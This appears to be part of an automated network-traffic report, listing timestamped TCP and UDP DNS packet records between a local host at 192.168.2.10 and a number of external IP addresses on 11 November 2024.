                                                                                                                                                                                                            Nov 11, 2024 18:25:29.553623915 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.554661989 CET806204323.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.554758072 CET6204380192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.559360027 CET6204180192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.565210104 CET8062041178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.569261074 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.569505930 CET6204480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.574304104 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.574361086 CET6204480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.575048923 CET6204480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.575387955 CET8049734208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.575429916 CET4973480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.575469971 CET6204380192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.576725960 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.576955080 CET4974180192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.582278967 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.582289934 CET806204323.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.583656073 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.583825111 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.583966970 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.584137917 CET8049741154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.584217072 CET4974180192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.592091084 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.684952974 CET4972680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.685312033 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.690654993 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.690757990 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.690797091 CET8049726188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.690845013 CET4972680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.691488028 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.696446896 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.733962059 CET6204780192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.739031076 CET806204799.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.739202976 CET6204780192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.739269972 CET6204780192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.744162083 CET806204799.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.986596107 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.986627102 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:29.986728907 CET6204280192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.016812086 CET806204323.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.016828060 CET806204323.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.016942978 CET6204380192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.022331953 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.024856091 CET6204480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.171583891 CET806204799.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.172770977 CET6204780192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.178622961 CET6204780192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.187803984 CET806204799.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.188188076 CET6204780192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.264625072 CET6204380192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.264664888 CET6204380192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.271461964 CET6204480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.276341915 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.310600042 CET6204880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315274954 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315304995 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315368891 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315386057 CET806204823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315510988 CET6204880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315742016 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315751076 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.315834045 CET6204880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.321244955 CET806204823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.375968933 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.376055002 CET6204480192.168.2.10208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.465089083 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.465142965 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.484402895 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.491111994 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.544199944 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.544301033 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.568926096 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.568969965 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.569025993 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.569262981 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.569277048 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.773809910 CET806204823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.773822069 CET806204823.253.46.64192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.773879051 CET6204880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.774300098 CET6204880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.774300098 CET6204880192.168.2.1023.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.790992022 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.791053057 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.791591883 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.791601896 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.791790962 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.791795015 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.840529919 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:30.840579033 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.092431068 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.092511892 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.094873905 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.094886065 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.095143080 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.095195055 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.095618963 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135036945 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135085106 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135139942 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135160923 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135171890 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135193110 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.135215044 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.136168957 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.136233091 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.139333963 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.215950966 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.216036081 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.216537952 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.216597080 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218141079 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218148947 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218179941 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218205929 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218213081 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218224049 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218385935 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218389988 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218873978 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218916893 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.218969107 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.297252893 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.297307968 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.297347069 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.297362089 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.297403097 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.297416925 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300059080 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300091982 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300137997 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300143003 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300168037 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300183058 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300190926 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300220013 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300316095 CET62049443192.168.2.1099.83.170.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.300333023 CET4436204999.83.170.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798692942 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798748016 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798751116 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798789978 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798818111 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798842907 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798856020 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798871994 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798887014 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798907042 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798913002 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798953056 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.798989058 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799002886 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799010992 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799030066 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799045086 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799048901 CET44362050188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799171925 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799371004 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.799397945 CET62050443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.867173910 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:31.872427940 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.205941916 CET8062046188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.206032991 CET6204680192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211000919 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211051941 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211122990 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211364031 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.211374998 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.646962881 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.647089958 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795435905 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795454025 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795795918 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.795859098 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.799824953 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:32.847346067 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653757095 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653845072 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653878927 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.653991938 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654238939 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654285908 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654293060 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654325008 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654406071 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654431105 CET44362051188.114.96.3192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654433966 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:33.654474974 CET62051443192.168.2.10188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.542455912 CET6204180192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.544277906 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549294949 CET8062052178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549396038 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.549607992 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:25:37.554754019 CET8062052178.162.203.202192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:39.993695021 CET8062042199.59.243.227192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:25:39.993757010 CET6204280192.168.2.10199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:25:49.893635035 CET6205280192.168.2.10178.162.203.202
                                                                                                                                                                                                            Nov 11, 2024 18:26:17.895730972 CET8064055103.150.10.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:17.895893097 CET6405580192.168.2.10103.150.10.48
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.158233881 CET800064057106.15.232.163192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.158360004 CET640578000192.168.2.10106.15.232.163
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.926469088 CET8064063154.85.183.50192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:18.926619053 CET6406380192.168.2.10154.85.183.50
                                                                                                                                                                                                            Nov 11, 2024 18:26:24.146555901 CET806406264.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:24.146805048 CET6406280192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:26:25.475164890 CET804999413.248.169.48192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:25.475390911 CET4999480192.168.2.1013.248.169.48
                                                                                                                                                                                                            Nov 11, 2024 18:26:26.501605034 CET806237364.225.91.73192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:26.501753092 CET6237380192.168.2.1064.225.91.73
                                                                                                                                                                                                            Nov 11, 2024 18:26:31.038290977 CET8062045154.212.231.82192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:31.038492918 CET6204580192.168.2.10154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:26:32.825973034 CET806405976.223.67.189192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:26:32.826165915 CET6405980192.168.2.1076.223.67.189
                                                                                                                                                                                                            Nov 11, 2024 18:27:30.391293049 CET8062044208.100.26.245192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:27:30.391544104 CET6204480192.168.2.10208.100.26.245

                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.694881916 CET4933653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.695012093 CET5527353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.695451021 CET5275453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.695538044 CET5737153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.702897072 CET53493361.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.703175068 CET53573711.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.705018044 CET53552731.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.721445084 CET5100753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.728034019 CET5659053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.728292942 CET5693653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.729621887 CET53527541.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.732230902 CET53510071.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.739361048 CET53565901.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.740472078 CET53569361.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.747172117 CET6030853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.749308109 CET5812653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.749546051 CET4925253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.749892950 CET5906253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.756906986 CET53581261.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.758949995 CET53603081.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.767708063 CET53492521.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:28.768521070 CET53590621.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.027956963 CET5219553192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.039161921 CET53521951.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.165517092 CET6437153192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.165891886 CET5011353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.166106939 CET5655653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.173723936 CET53643711.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.176280022 CET53501131.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.177328110 CET53565561.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.215796947 CET5144853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.226166010 CET5984953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.226435900 CET6358753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.226663113 CET5017053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.237447023 CET53598491.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.246527910 CET5830353192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.246856928 CET6405653192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.247051954 CET6123953192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.247203112 CET5929053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.254580975 CET53640561.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.254833937 CET53592901.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.256267071 CET53583031.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.258232117 CET53635871.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.259155989 CET53612391.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.272900105 CET6088453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.273267031 CET6007453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.279449940 CET5669453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.280380964 CET53600741.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.283776999 CET53608841.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.290913105 CET53566941.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.298640013 CET5099753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.299180031 CET5487053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.299487114 CET6552453192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.309039116 CET53509971.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.310343027 CET53548701.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.310373068 CET53655241.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.341470003 CET5223053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.359932899 CET5338053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360095978 CET5006053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360259056 CET6474053192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360405922 CET5424253192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360575914 CET5875853192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.360713959 CET5932753192.168.2.101.1.1.1
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.367841005 CET53533801.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.371342897 CET53500601.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.372226000 CET53647401.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.372875929 CET53587581.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.374099016 CET53522301.1.1.1192.168.2.10
                                                                                                                                                                                                            Nov 11, 2024 18:24:29.393404961 CET53593271.1.1.1192.168.2.10
